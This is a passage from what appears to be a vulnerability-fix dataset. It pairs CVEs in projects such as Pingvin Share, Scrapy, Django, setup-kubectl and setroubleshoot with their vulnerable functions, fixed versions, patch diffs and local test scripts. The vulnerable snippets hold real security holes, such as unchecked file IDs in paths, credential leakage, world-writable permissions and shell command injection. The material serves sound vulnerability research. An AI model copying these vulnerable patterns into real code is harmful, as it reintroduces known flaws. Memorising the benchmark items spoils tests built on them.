super().clean()\n if self.errors:\n 
return self.cleaned_data\n oldpassword = self.cleaned_data.get(\"oldpassword\")\n newpassword = self.cleaned_data.get(\"newpassword\")\n confirmation = self.cleaned_data.get(\"confirmation\")\n if newpassword and confirmation:\n if oldpassword:\n if newpassword != confirmation:\n self.add_error(\"confirmation\", _(\"Passwords mismatch\"))\n else:\n password_validation.validate_password(\n confirmation, self.instance)\n else:\n self.add_error(\"oldpassword\", _(\"This field is required.\"))\n elif newpassword or confirmation:\n if not confirmation:\n self.add_error(\"confirmation\", _(\"This field is required.\"))\n else:\n self.add_error(\"newpassword\", _(\"This field is required.\"))\n return self.cleaned_data"}], "vul_patch": "--- a/modoboa/core/forms.py\n+++ b/modoboa/core/forms.py\n@@ -14,4 +14,9 @@\n confirmation, self.instance)\n else:\n self.add_error(\"oldpassword\", _(\"This field is required.\"))\n+ elif newpassword or confirmation:\n+ if not confirmation:\n+ self.add_error(\"confirmation\", _(\"This field is required.\"))\n+ else:\n+ self.add_error(\"newpassword\", _(\"This field is required.\"))\n return self.cleaned_data\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-22137", "cve_description": "Pingvin Share is a self-hosted file sharing platform and an alternative for WeTransfer. This vulnerability allows an authenticated or unauthenticated (if anonymous shares are allowed) user to overwrite arbitrary files on the server, including sensitive system files, via HTTP POST requests. The issue has been patched in version 1.4.0.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/stonith404/pingvin-share", "patch_url": ["https://github.com/stonith404/pingvin-share/commit/6cf5c66fe2eda1e0a525edf7440d047fe2f0e35b"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_230_1", "commit": "51478b6", "file_path": "backend/src/file/file.service.ts", "start_line": 25, "end_line": 114, "snippet": " async create(\n data: string,\n chunk: { index: number; total: number },\n file: { id?: string; name: string },\n shareId: string,\n ) {\n if (!file.id) file.id = crypto.randomUUID();\n\n const share = await this.prisma.share.findUnique({\n where: { id: shareId },\n include: { files: true, reverseShare: true },\n });\n\n if (share.uploadLocked)\n throw new BadRequestException(\"Share is already completed\");\n\n let diskFileSize: number;\n try {\n diskFileSize = fs.statSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n ).size;\n } catch {\n diskFileSize = 0;\n }\n\n // If the sent chunk index and the expected chunk index doesn't match throw an error\n const chunkSize = this.config.get(\"share.chunkSize\");\n const expectedChunkIndex = Math.ceil(diskFileSize / chunkSize);\n\n if (expectedChunkIndex != chunk.index)\n throw new BadRequestException({\n message: \"Unexpected chunk received\",\n error: \"unexpected_chunk_index\",\n expectedChunkIndex,\n });\n\n const buffer = Buffer.from(data, \"base64\");\n\n // Check if there is enough space on the server\n const space = await fs.promises.statfs(SHARE_DIRECTORY);\n const availableSpace = space.bavail * space.bsize;\n if (availableSpace < buffer.byteLength) {\n throw new InternalServerErrorException(\"Not enough space on the server\");\n }\n\n // Check if share 
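The CVE-2023-2160 patch above adds one elif: previously the strength check ran only when both newpassword and confirmation were present, so submitting just one of the two fields skipped password validation altogether. A reduced Python sketch of the branch structure; the oldpassword handling and Django form machinery are omitted:

    def check_password_fields(newpassword: str, confirmation: str, errors: dict) -> None:
        if newpassword and confirmation:
            if newpassword != confirmation:
                errors["confirmation"] = "Passwords mismatch"
            # ...otherwise run the strength validator on the new password...
        elif newpassword or confirmation:  # the branch the patch adds
            missing = "confirmation" if not confirmation else "newpassword"
            errors[missing] = "This field is required."

    errs = {}
    check_password_fields("hunter2", "", errs)
    print(errs)  # {'confirmation': 'This field is required.'} -- no longer skipped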
size limit is exceeded\n const fileSizeSum = share.files.reduce(\n (n, { size }) => n + parseInt(size),\n 0,\n );\n\n const shareSizeSum = fileSizeSum + diskFileSize + buffer.byteLength;\n\n if (\n shareSizeSum > this.config.get(\"share.maxSize\") ||\n (share.reverseShare?.maxShareSize &&\n shareSizeSum > parseInt(share.reverseShare.maxShareSize))\n ) {\n throw new HttpException(\n \"Max share size exceeded\",\n HttpStatus.PAYLOAD_TOO_LARGE,\n );\n }\n\n fs.appendFileSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n buffer,\n );\n\n const isLastChunk = chunk.index == chunk.total - 1;\n if (isLastChunk) {\n fs.renameSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n `${SHARE_DIRECTORY}/${shareId}/${file.id}`,\n );\n const fileSize = fs.statSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}`,\n ).size;\n await this.prisma.file.create({\n data: {\n id: file.id,\n name: file.name,\n size: fileSize.toString(),\n share: { connect: { id: shareId } },\n },\n });\n }\n\n return file;\n }"}], "fix_func": [{"id": "fix_js_230_1", "commit": "6cf5c66fe2eda1e0a525edf7440d047fe2f0e35b", "file_path": "backend/src/file/file.service.ts", "start_line": 26, "end_line": 119, "snippet": " async create(\n data: string,\n chunk: { index: number; total: number },\n file: { id?: string; name: string },\n shareId: string,\n ) {\n if (!file.id) {\n file.id = crypto.randomUUID();\n } else if (!isValidUUID(file.id)) {\n throw new BadRequestException(\"Invalid file ID format\");\n }\n\n const share = await this.prisma.share.findUnique({\n where: { id: shareId },\n include: { files: true, reverseShare: true },\n });\n\n if (share.uploadLocked)\n throw new BadRequestException(\"Share is already completed\");\n\n let diskFileSize: number;\n try {\n diskFileSize = fs.statSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n ).size;\n } catch {\n diskFileSize = 0;\n }\n\n // If the sent chunk index and the expected chunk index doesn't match throw an error\n const chunkSize = this.config.get(\"share.chunkSize\");\n const expectedChunkIndex = Math.ceil(diskFileSize / chunkSize);\n\n if (expectedChunkIndex != chunk.index)\n throw new BadRequestException({\n message: \"Unexpected chunk received\",\n error: \"unexpected_chunk_index\",\n expectedChunkIndex,\n });\n\n const buffer = Buffer.from(data, \"base64\");\n\n // Check if there is enough space on the server\n const space = await fs.promises.statfs(SHARE_DIRECTORY);\n const availableSpace = space.bavail * space.bsize;\n if (availableSpace < buffer.byteLength) {\n throw new InternalServerErrorException(\"Not enough space on the server\");\n }\n\n // Check if share size limit is exceeded\n const fileSizeSum = share.files.reduce(\n (n, { size }) => n + parseInt(size),\n 0,\n );\n\n const shareSizeSum = fileSizeSum + diskFileSize + buffer.byteLength;\n\n if (\n shareSizeSum > this.config.get(\"share.maxSize\") ||\n (share.reverseShare?.maxShareSize &&\n shareSizeSum > parseInt(share.reverseShare.maxShareSize))\n ) {\n throw new HttpException(\n \"Max share size exceeded\",\n HttpStatus.PAYLOAD_TOO_LARGE,\n );\n }\n\n fs.appendFileSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n buffer,\n );\n\n const isLastChunk = chunk.index == chunk.total - 1;\n if (isLastChunk) {\n fs.renameSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n `${SHARE_DIRECTORY}/${shareId}/${file.id}`,\n );\n const fileSize = fs.statSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}`,\n ).size;\n await this.prisma.file.create({\n data: {\n id: 
file.id,\n name: file.name,\n size: fileSize.toString(),\n share: { connect: { id: shareId } },\n },\n });\n }\n\n return file;\n }"}], "vul_patch": "--- a/backend/src/file/file.service.ts\n+++ b/backend/src/file/file.service.ts\n@@ -4,7 +4,11 @@\n file: { id?: string; name: string },\n shareId: string,\n ) {\n- if (!file.id) file.id = crypto.randomUUID();\n+ if (!file.id) {\n+ file.id = crypto.randomUUID();\n+ } else if (!isValidUUID(file.id)) {\n+ throw new BadRequestException(\"Invalid file ID format\");\n+ }\n \n const share = await this.prisma.share.findUnique({\n where: { id: shareId },\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-41125", "cve_description": "Scrapy is a high-level web crawling and scraping framework for Python. If you use `HttpAuthMiddleware` (i.e. the `http_user` and `http_pass` spider attributes) for HTTP authentication, all requests will expose your credentials to the request target. This includes requests generated by Scrapy components, such as `robots.txt` requests sent by Scrapy when the `ROBOTSTXT_OBEY` setting is set to `True`, or as requests reached through redirects. Upgrade to Scrapy 2.5.1 and use the new `http_auth_domain` spider attribute to control which domains are allowed to receive the configured HTTP authentication credentials. If you are using Scrapy 1.8 or a lower version, and upgrading to Scrapy 2.5.1 is not an option, you may upgrade to Scrapy 1.8.1 instead. If you cannot upgrade, set your HTTP authentication credentials on a per-request basis, using for example the `w3lib.http.basic_auth_header` function to convert your credentials into a value that you can assign to the `Authorization` header of your request, instead of defining your credentials globally using `HttpAuthMiddleware`.", "cwe_info": {"CWE-522": {"name": "Insufficiently Protected Credentials", "description": "The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval."}}, "repo": "https://github.com/scrapy/scrapy", "patch_url": ["https://github.com/scrapy/scrapy/commit/b01d69a1bf48060daec8f751368622352d8b85a6"], "programing_language": "Python", "vul_func": [{"id": "vul_py_50_1", "commit": "4183925", "file_path": "scrapy/downloadermiddlewares/httpauth.py", "start_line": 22, "end_line": 26, "snippet": " def spider_opened(self, spider):\n usr = getattr(spider, 'http_user', '')\n pwd = getattr(spider, 'http_pass', '')\n if usr or pwd:\n self.auth = basic_auth_header(usr, pwd)"}, {"id": "vul_py_50_2", "commit": "4183925", "file_path": "scrapy/downloadermiddlewares/httpauth.py", "start_line": 28, "end_line": 31, "snippet": " def process_request(self, request, spider):\n auth = getattr(self, 'auth', None)\n if auth and b'Authorization' not in request.headers:\n request.headers[b'Authorization'] = auth"}], "fix_func": [{"id": "fix_py_50_1", "commit": "b01d69a1bf48060daec8f751368622352d8b85a6", "file_path": "scrapy/downloadermiddlewares/httpauth.py", "start_line": 26, "end_line": 40, "snippet": " def spider_opened(self, spider):\n usr = getattr(spider, 'http_user', '')\n pwd = getattr(spider, 'http_pass', '')\n if usr or pwd:\n self.auth = basic_auth_header(usr, pwd)\n if not hasattr(spider, 'http_auth_domain'):\n warnings.warn('Using HttpAuthMiddleware without http_auth_domain is deprecated and can cause security '\n 'problems if the spider makes requests to several different domains. 
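The CVE-2025-22137 fix above boils down to one rule: a client-supplied file.id is used to build an on-disk path, so it must parse as a UUID before it is trusted. A Python sketch of that validation idea (the project itself does this in TypeScript with an isValidUUID helper):

    import uuid

    def safe_file_id(client_id=None):
        # Server-generated IDs are fresh UUIDs; client-supplied IDs are
        # accepted only if they parse as one, ruling out values such as
        # "../../etc/cron.d/evil" being spliced into the share path.
        if client_id is None:
            return str(uuid.uuid4())
        try:
            return str(uuid.UUID(client_id))
        except ValueError:
            raise ValueError("Invalid file ID format") from None

    print(safe_file_id())                                        # fresh UUID
    print(safe_file_id("3f2b9c1e-8a4d-4e5f-9b6a-1c2d3e4f5a6b"))  # accepted
    # safe_file_id("../../etc/passwd") -> ValueError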
http_auth_domain '\n 'will be set to the domain of the first request, please set it to the correct value '\n 'explicitly.',\n category=ScrapyDeprecationWarning)\n self.domain_unset = True\n else:\n self.domain = spider.http_auth_domain\n self.domain_unset = False"}, {"id": "fix_py_50_2", "commit": "b01d69a1bf48060daec8f751368622352d8b85a6", "file_path": "scrapy/downloadermiddlewares/httpauth.py", "start_line": 42, "end_line": 50, "snippet": " def process_request(self, request, spider):\n auth = getattr(self, 'auth', None)\n if auth and b'Authorization' not in request.headers:\n domain = urlparse_cached(request).hostname\n if self.domain_unset:\n self.domain = domain\n self.domain_unset = False\n if not self.domain or url_is_from_any_domain(request.url, [self.domain]):\n request.headers[b'Authorization'] = auth"}], "vul_patch": "--- a/scrapy/downloadermiddlewares/httpauth.py\n+++ b/scrapy/downloadermiddlewares/httpauth.py\n@@ -3,3 +3,13 @@\n pwd = getattr(spider, 'http_pass', '')\n if usr or pwd:\n self.auth = basic_auth_header(usr, pwd)\n+ if not hasattr(spider, 'http_auth_domain'):\n+ warnings.warn('Using HttpAuthMiddleware without http_auth_domain is deprecated and can cause security '\n+ 'problems if the spider makes requests to several different domains. http_auth_domain '\n+ 'will be set to the domain of the first request, please set it to the correct value '\n+ 'explicitly.',\n+ category=ScrapyDeprecationWarning)\n+ self.domain_unset = True\n+ else:\n+ self.domain = spider.http_auth_domain\n+ self.domain_unset = False\n\n--- a/scrapy/downloadermiddlewares/httpauth.py\n+++ b/scrapy/downloadermiddlewares/httpauth.py\n@@ -1,4 +1,9 @@\n def process_request(self, request, spider):\n auth = getattr(self, 'auth', None)\n if auth and b'Authorization' not in request.headers:\n- request.headers[b'Authorization'] = auth\n+ domain = urlparse_cached(request).hostname\n+ if self.domain_unset:\n+ self.domain = domain\n+ self.domain_unset = False\n+ if not self.domain or url_is_from_any_domain(request.url, [self.domain]):\n+ request.headers[b'Authorization'] = auth\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-41125:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/scrapy\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2021-41125/bin/python -m pytest tests/test_downloadermiddleware_httpauth.py -k \"HttpAuthMiddlewareLegacyTest or HttpAuthAnyMiddlewareTest or test_no_auth or test_auth_domain or test_auth_subdomain\" -p no:warning --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-41125:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/scrapy\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2021-41125/bin/python -m pytest tests/test_downloadermiddleware_httpauth.py -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2015-8213", "cve_description": "The get_format function in utils/formats.py in Django before 1.7.x before 1.7.11, 1.8.x before 1.8.7, and 1.9.x before 1.9rc2 might allow remote attackers to obtain sensitive application secrets via a settings key in place of a date/time format setting, as demonstrated by SECRET_KEY.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/django/django", "patch_url": 
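Both mitigations named in the CVE-2021-41125 description can be shown side by side: the new http_auth_domain spider attribute (credentials only for that domain and its subdomains) and, for pre-2.5.1 installs, setting the Authorization header per request via w3lib. A sketch with illustrative spider names and URLs:

    import scrapy
    from w3lib.http import basic_auth_header

    class ExampleSpider(scrapy.Spider):
        name = "example"
        # Patched middleware: credentials go only to this domain (and its
        # subdomains), not to redirect targets or robots.txt on other hosts.
        http_user = "user"
        http_pass = "pass"
        http_auth_domain = "api.example.com"

        def start_requests(self):
            # Pre-2.5.1 workaround from the advisory: bypass
            # HttpAuthMiddleware and attach the header per request.
            yield scrapy.Request(
                "https://api.example.com/items",
                headers={"Authorization": basic_auth_header("user", "pass")},
            )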
["https://github.com/django/django/commit/316bc3fc9437c5960c24baceb93c73f1939711e4"], "programing_language": "Python", "vul_func": [{"id": "vul_py_12_1", "commit": "710e11d", "file_path": "django/utils/formats.py", "start_line": 85, "end_line": 120, "snippet": "def get_format(format_type, lang=None, use_l10n=None):\n \"\"\"\n For a specific format type, returns the format for the current\n language (locale), defaults to the format in the settings.\n format_type is the name of the format, e.g. 'DATE_FORMAT'\n\n If use_l10n is provided and is not None, that will force the value to\n be localized (or not), overriding the value of settings.USE_L10N.\n \"\"\"\n format_type = force_str(format_type)\n if use_l10n or (use_l10n is None and settings.USE_L10N):\n if lang is None:\n lang = get_language()\n cache_key = (format_type, lang)\n try:\n cached = _format_cache[cache_key]\n if cached is not None:\n return cached\n else:\n # Return the general setting by default\n return getattr(settings, format_type)\n except KeyError:\n for module in get_format_modules(lang):\n try:\n val = getattr(module, format_type)\n for iso_input in ISO_INPUT_FORMATS.get(format_type, ()):\n if iso_input not in val:\n if isinstance(val, tuple):\n val = list(val)\n val.append(iso_input)\n _format_cache[cache_key] = val\n return val\n except AttributeError:\n pass\n _format_cache[cache_key] = None\n return getattr(settings, format_type)"}], "fix_func": [{"id": "fix_py_12_1", "commit": "316bc3fc9437c5960c24baceb93c73f1939711e4", "file_path": "django/utils/formats.py", "start_line": 103, "end_line": 140, "snippet": "def get_format(format_type, lang=None, use_l10n=None):\n \"\"\"\n For a specific format type, returns the format for the current\n language (locale), defaults to the format in the settings.\n format_type is the name of the format, e.g. 
'DATE_FORMAT'\n\n If use_l10n is provided and is not None, that will force the value to\n be localized (or not), overriding the value of settings.USE_L10N.\n \"\"\"\n format_type = force_str(format_type)\n if format_type not in FORMAT_SETTINGS:\n return format_type\n if use_l10n or (use_l10n is None and settings.USE_L10N):\n if lang is None:\n lang = get_language()\n cache_key = (format_type, lang)\n try:\n cached = _format_cache[cache_key]\n if cached is not None:\n return cached\n else:\n # Return the general setting by default\n return getattr(settings, format_type)\n except KeyError:\n for module in get_format_modules(lang):\n try:\n val = getattr(module, format_type)\n for iso_input in ISO_INPUT_FORMATS.get(format_type, ()):\n if iso_input not in val:\n if isinstance(val, tuple):\n val = list(val)\n val.append(iso_input)\n _format_cache[cache_key] = val\n return val\n except AttributeError:\n pass\n _format_cache[cache_key] = None\n return getattr(settings, format_type)"}, {"id": "fix_py_12_2", "commit": "316bc3fc9437c5960c24baceb93c73f1939711e4", "file_path": "django/utils/formats.py", "start_line": 33, "end_line": 50, "snippet": "FORMAT_SETTINGS = frozenset([\n 'DECIMAL_SEPARATOR',\n 'THOUSAND_SEPARATOR',\n 'NUMBER_GROUPING',\n 'FIRST_DAY_OF_WEEK',\n 'MONTH_DAY_FORMAT',\n 'TIME_FORMAT',\n 'DATE_FORMAT',\n 'DATETIME_FORMAT',\n 'SHORT_DATE_FORMAT',\n 'SHORT_DATETIME_FORMAT',\n 'YEAR_MONTH_FORMAT',\n 'DATE_INPUT_FORMATS',\n 'TIME_INPUT_FORMATS',\n 'DATETIME_INPUT_FORMATS',\n])\n\n"}], "vul_patch": "--- a/django/utils/formats.py\n+++ b/django/utils/formats.py\n@@ -8,6 +8,8 @@\n be localized (or not), overriding the value of settings.USE_L10N.\n \"\"\"\n format_type = force_str(format_type)\n+ if format_type not in FORMAT_SETTINGS:\n+ return format_type\n if use_l10n or (use_l10n is None and settings.USE_L10N):\n if lang is None:\n lang = get_language()\n\n--- /dev/null\n+++ b/django/utils/formats.py\n@@ -0,0 +1,17 @@\n+FORMAT_SETTINGS = frozenset([\n+ 'DECIMAL_SEPARATOR',\n+ 'THOUSAND_SEPARATOR',\n+ 'NUMBER_GROUPING',\n+ 'FIRST_DAY_OF_WEEK',\n+ 'MONTH_DAY_FORMAT',\n+ 'TIME_FORMAT',\n+ 'DATE_FORMAT',\n+ 'DATETIME_FORMAT',\n+ 'SHORT_DATE_FORMAT',\n+ 'SHORT_DATETIME_FORMAT',\n+ 'YEAR_MONTH_FORMAT',\n+ 'DATE_INPUT_FORMATS',\n+ 'TIME_INPUT_FORMATS',\n+ 'DATETIME_INPUT_FORMATS',\n+])\n+\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-8213:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2015-8213/bin/python ./runtests.py i18n.tests.FormattingTests.test_format_arbitrary_settings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-8213:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2015-8213/bin/python ./runtests.py i18n.tests\n"} {"cve_id": "CVE-2023-23939", "cve_description": "Azure/setup-kubectl is a GitHub Action for installing Kubectl. This vulnerability only impacts versions before version 3. An insecure temporary creation of a file allows other actors on the Actions runner to replace the Kubectl binary created by this action because it is world writable. This Kubectl tool installer runs `fs.chmodSync(kubectlPath, 777)` to set permissions on the Kubectl binary, however, this allows any local user to replace the Kubectl binary. 
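The CVE-2015-8213 fix above is a two-line whitelist check: any format_type outside FORMAT_SETTINGS is returned verbatim instead of being looked up on the settings object, so a crafted key such as SECRET_KEY, smuggled in where a date/time format name is expected, no longer leaks the secret. A condensed sketch of the guard:

    FORMAT_SETTINGS = frozenset(["DATE_FORMAT", "TIME_FORMAT"])  # abridged list

    class Settings:
        DATE_FORMAT = "N j, Y"
        SECRET_KEY = "s3cr3t"  # must never be reachable through get_format

    def get_format(format_type, settings):
        if format_type not in FORMAT_SETTINGS:  # the added guard
            return format_type                  # treated as a literal format
        return getattr(settings, format_type)

    s = Settings()
    print(get_format("DATE_FORMAT", s))  # 'N j, Y'
    print(get_format("SECRET_KEY", s))   # 'SECRET_KEY', not the secret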
This allows privilege escalation to the user that can also run kubectl, most likely root. This attack is only possible if an attacker somehow breached the GitHub actions runner or if a user is utilizing an Action that maliciously executes this attack. This has been fixed and released in all versions `v3` and later. 775 permissions are used instead. Users are advised to upgrade. There are no known workarounds for this issue.\n", "cwe_info": {"CWE-732": {"name": "Incorrect Permission Assignment for Critical Resource", "description": "The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors."}}, "repo": "https://github.com/Azure/setup-kubectl", "patch_url": ["https://github.com/Azure/setup-kubectl/commit/d449d75495d2b9d1463555bb00ca3dca77a42ab6"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_222_1", "commit": "3866693", "file_path": "src/run.ts", "start_line": 41, "end_line": 62, "snippet": "export async function downloadKubectl(version: string): Promise {\n let cachedToolpath = toolCache.find(kubectlToolName, version);\n let kubectlDownloadPath = '';\n const arch = getKubectlArch();\n if (!cachedToolpath) {\n try {\n kubectlDownloadPath = await toolCache.downloadTool(getkubectlDownloadURL(version, arch));\n } catch (exception) {\n if (exception instanceof toolCache.HTTPError && exception.httpStatusCode === 404) {\n throw new Error(util.format(\"Kubectl '%s' for '%s' arch not found.\", version, arch));\n } else {\n throw new Error('DownloadKubectlFailed');\n }\n }\n\n cachedToolpath = await toolCache.cacheFile(kubectlDownloadPath, kubectlToolName + getExecutableExtension(), kubectlToolName, version);\n }\n\n const kubectlPath = path.join(cachedToolpath, kubectlToolName + getExecutableExtension());\n fs.chmodSync(kubectlPath, '777');\n return kubectlPath;\n}"}], "fix_func": [{"id": "fix_js_222_1", "commit": "d449d75495d2b9d1463555bb00ca3dca77a42ab6", "file_path": "src/run.ts", "start_line": 41, "end_line": 62, "snippet": "export async function downloadKubectl(version: string): Promise {\n let cachedToolpath = toolCache.find(kubectlToolName, version);\n let kubectlDownloadPath = '';\n const arch = getKubectlArch();\n if (!cachedToolpath) {\n try {\n kubectlDownloadPath = await toolCache.downloadTool(getkubectlDownloadURL(version, arch));\n } catch (exception) {\n if (exception instanceof toolCache.HTTPError && exception.httpStatusCode === 404) {\n throw new Error(util.format(\"Kubectl '%s' for '%s' arch not found.\", version, arch));\n } else {\n throw new Error('DownloadKubectlFailed');\n }\n }\n\n cachedToolpath = await toolCache.cacheFile(kubectlDownloadPath, kubectlToolName + getExecutableExtension(), kubectlToolName, version);\n }\n\n const kubectlPath = path.join(cachedToolpath, kubectlToolName + getExecutableExtension());\n fs.chmodSync(kubectlPath, '775');\n return kubectlPath;\n}"}], "vul_patch": "--- a/src/run.ts\n+++ b/src/run.ts\n@@ -17,6 +17,6 @@\n }\n \n const kubectlPath = path.join(cachedToolpath, kubectlToolName + getExecutableExtension());\n- fs.chmodSync(kubectlPath, '777');\n+ fs.chmodSync(kubectlPath, '775');\n return kubectlPath;\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-4445", "cve_description": "The fix_lookup_id function in sealert in setroubleshoot before 3.2.23 allows local users to execute arbitrary commands as root by triggering an SELinux denial with a crafted file name, related to executing external commands with the 
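The CVE-2023-23939 patch above is a single character pair, 777 to 775, and the security difference is exactly the world-write bit. A Python illustration of the two modes; note that Node's fs.chmodSync parses the string '777' as octal, so 0o777/0o775 are the equivalent values here:

    import stat

    world_writable = 0o777  # before the patch
    patched = 0o775         # after the patch

    # S_IWOTH is the "others may write" bit -- the one that let any local
    # user on the runner overwrite the kubectl binary.
    print(bool(world_writable & stat.S_IWOTH))  # True
    print(bool(patched & stat.S_IWOTH))         # False

    # Applying the fixed mode, e.g.: os.chmod("kubectl", 0o775)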
commands.getstatusoutput function.", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/fedora-selinux/setroubleshoot", "patch_url": ["https://github.com/fedora-selinux/setroubleshoot/commit/2d12677629ca319310f6263688bb1b7f676c01b7"], "programing_language": "Python", "vul_func": [{"id": "vul_py_269_1", "commit": "e83aa2e", "file_path": "framework/src/sealert", "start_line": 143, "end_line": 163, "snippet": " def query_alerts_callback(sigs):\n import commands\n for siginfo in sigs.signature_list:\n for plugin in siginfo.plugin_list:\n if analysis_id == plugin.analysis_id:\n p = load_plugins(analysis_id)[0]\n if p.fixable == False:\n print _(\"Not fixable.\")\n cl.main_loop.quit()\n return\n siginfo.update_derived_template_substitutions()\n command = siginfo.substitute(p.get_fix_cmd(siginfo.audit_event, plugin.args))\n rc, output = commands.getstatusoutput(command)\n if rc == 0:\n print _(\"Successfully ran %s\" % command)\n else:\n print output\n cl.main_loop.quit()\n return\n print _(\"Plugin %s not valid for %s id\") % (analysis_id, local_id)\n cl.main_loop.quit()"}], "fix_func": [{"id": "fix_py_269_1", "commit": "2d12677", "file_path": "framework/src/sealert", "start_line": 143, "end_line": 163, "snippet": " def query_alerts_callback(sigs):\n import subprocess\n for siginfo in sigs.signature_list:\n for plugin in siginfo.plugin_list:\n if analysis_id == plugin.analysis_id:\n p = load_plugins(analysis_id)[0]\n if p.fixable == False:\n print _(\"Not fixable.\")\n cl.main_loop.quit()\n return\n siginfo.update_derived_template_substitutions()\n command = siginfo.substitute_array(p.get_fix_cmd(siginfo.audit_event, plugin.args).split())\n try:\n output = subprocess.check_output(command)\n print _(\"Successfully ran %s\" % ' '.join(command))\n except subprocess.CalledProcessError as e:\n print(e.output)\n cl.main_loop.quit()\n return\n print _(\"Plugin %s not valid for %s id\") % (analysis_id, local_id)\n cl.main_loop.quit()"}, {"id": "fix_py_269_2", "commit": "2d12677", "file_path": "framework/src/setroubleshoot/signature.py", "start_line": 463, "end_line": 464, "snippet": " def substitute_array(self, args):\n return [self.substitute(txt) for txt in args]"}], "vul_patch": "--- a/framework/src/sealert\n+++ b/framework/src/sealert\n@@ -1,5 +1,5 @@\n def query_alerts_callback(sigs):\n- import commands\n+ import subprocess\n for siginfo in sigs.signature_list:\n for plugin in siginfo.plugin_list:\n if analysis_id == plugin.analysis_id:\n@@ -9,12 +9,12 @@\n cl.main_loop.quit()\n return\n siginfo.update_derived_template_substitutions()\n- command = siginfo.substitute(p.get_fix_cmd(siginfo.audit_event, plugin.args))\n- rc, output = commands.getstatusoutput(command)\n- if rc == 0:\n- print _(\"Successfully ran %s\" % command)\n- else:\n- print output\n+ command = siginfo.substitute_array(p.get_fix_cmd(siginfo.audit_event, plugin.args).split())\n+ try:\n+ output = subprocess.check_output(command)\n+ print _(\"Successfully ran %s\" % ' '.join(command))\n+ except subprocess.CalledProcessError as e:\n+ print(e.output)\n cl.main_loop.quit()\n return\n print _(\"Plugin %s not valid for %s id\") % (analysis_id, local_id)\n\n--- 
/dev/null\n+++ b/framework/src/sealert\n@@ -0,0 +1,2 @@\n+ def substitute_array(self, args):\n+ return [self.substitute(txt) for txt in args]\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-18367", "cve_description": "libseccomp-golang 0.9.0 and earlier incorrectly generates BPFs that OR multiple arguments rather than ANDing them. A process running under a restrictive seccomp filter that specified multiple syscall arguments could bypass intended access restrictions by specifying a single matching argument.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/seccomp/libseccomp-golang", "patch_url": ["https://github.com/seccomp/libseccomp-golang/commit/06e7a29f36a34b8cf419aeb87b979ee508e58f9e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_216_1", "commit": "fc02980", "file_path": "seccomp_internal.go", "start_line": 242, "end_line": 266, "snippet": "func (f *ScmpFilter) addRuleWrapper(call ScmpSyscall, action ScmpAction, exact bool, cond C.scmp_cast_t) error {\n\tvar length C.uint\n\tif cond != nil {\n\t\tlength = 1\n\t} else {\n\t\tlength = 0\n\t}\n\n\tvar retCode C.int\n\tif exact {\n\t\tretCode = C.seccomp_rule_add_exact_array(f.filterCtx, action.toNative(), C.int(call), length, cond)\n\t} else {\n\t\tretCode = C.seccomp_rule_add_array(f.filterCtx, action.toNative(), C.int(call), length, cond)\n\t}\n\n\tif syscall.Errno(-1*retCode) == syscall.EFAULT {\n\t\treturn fmt.Errorf(\"unrecognized syscall\")\n\t} else if syscall.Errno(-1*retCode) == syscall.EPERM {\n\t\treturn fmt.Errorf(\"requested action matches default action of filter\")\n\t} else if retCode != 0 {\n\t\treturn syscall.Errno(-1 * retCode)\n\t}\n\n\treturn nil\n}"}, {"id": "vul_go_216_2", "commit": "fc02980", "file_path": "seccomp_internal.go", "start_line": 269, "end_line": 301, "snippet": "func (f *ScmpFilter) addRuleGeneric(call ScmpSyscall, action ScmpAction, exact bool, conds []ScmpCondition) error {\n\tf.lock.Lock()\n\tdefer f.lock.Unlock()\n\n\tif !f.valid {\n\t\treturn errBadFilter\n\t}\n\n\tif len(conds) 